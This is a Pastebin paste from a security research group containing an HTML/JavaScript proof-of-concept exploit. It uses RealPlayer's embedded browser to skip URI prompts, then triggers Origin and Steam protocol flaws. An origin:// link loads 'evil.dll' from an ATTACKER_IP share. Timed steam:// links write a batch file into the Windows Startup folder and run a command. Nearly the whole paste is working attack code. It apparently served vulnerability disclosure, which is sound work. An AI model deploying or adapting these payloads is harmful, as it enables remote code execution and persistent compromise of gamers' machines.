API tools faq
paste
Advertisement
revuln

Bypassing prompts of Origin & Steam links (via RealPlayer)

revuln
Mar 20th, 2013
1,055
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 2.43 KB | None | 0 0
raw download clone embed print report
  1. <html>
  2. <body>
  3.  
  4. <object
  5.     id="test"
  6.     type="application/vnd.rn-realplayer-javascript"
  7.     width="0" height="0">
  8. </object>
  9.  
  10. <script type="text/javascript">
  11.  
  12.     // Credits:
  13.     //   ReVuln
  14.     //   revuln.com
  15.     //   twitter.com/revuln
  16.  
  17.     // The embedded browser available in RealPlayer allows to open any
  18.     // registered URI without prompting the user, just like Safari does.
  19.     // We can use it to improve the triggers for both Steam and Origin vulnerabilities
  20.  
  21.     var check_if_rp = '#rp';
  22.  
  23.     if(document.location.href.indexOf(check_if_rp) < 0) {
  24.  
  25.         // browser
  26.         document.write("BROWSER");
  27.  
  28.         var test = document.getElementById('test');
  29.  
  30.         // open the RealPlayer browser
  31.         test.OpenURLInPlayerBrowser(
  32.             document.location.href + check_if_rp
  33.         );
  34.  
  35.     } else {
  36.  
  37.         // RealPlayer
  38.         document.write("REALPLAYER");
  39.  
  40.  
  41.         // Origin vulnerability
  42.         //  http://revuln.com/files/ReVuln_EA_Origin_Insecurity.pdf
  43.         // exploit the openautomate option of Crysis 3 and 2,
  44.         // Battlefield 3 and others like RE5 and DMC4
  45.  
  46.             var crysis  = '71503,71505,71645,71656,71708,71709,71710,71711,71779,1003897,1003898,1004521';
  47.             var bf3     = '70619,71067,71171,71633,1000689';
  48.             var others  = '71604,71606,71716,71613,1004689';
  49.  
  50.             window.location =
  51.                     'origin://LaunchGame/'
  52.                   + crysis
  53.             + ',' + bf3
  54.             + ',' + others
  55.                   + '?CommandParams= -openautomate \\\\ATTACKER_IP\\evil.dll';
  56.  
  57.  
  58.         // Steam vulnerability... yes, Steam IS still vulnerable
  59.         //  http://revuln.com/files/ReVuln_Steam_Browser_Protocol_Insecurity.pdf
  60.         // the following is the "original" PoC used in our video and shown at
  61.         // BlackHat Europe 2013
  62.  
  63.             function do1() {
  64.                 window.location='steam://run/440// -hijack -dev';
  65.             }
  66.             function do2() {
  67.                 window.location='steam://run/440// -hijack %2bcon_logfile "%5cDocuments and Settings%5cAdministrator%5cStart Menu%5cPrograms%5cStartup%5cx.bat"';
  68.             }
  69.             function do3() {
  70.                 window.location='steam://run/440// -hijack %2becho calc %2bquit';
  71.             }
  72.  
  73.             setTimeout("do1()", 0);
  74.             setTimeout("do2()", 20000);
  75.             setTimeout("do3()", 22000);
  76.  
  77.     }
  78.  
  79. </script>
  80.  
  81. </body>
  82. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!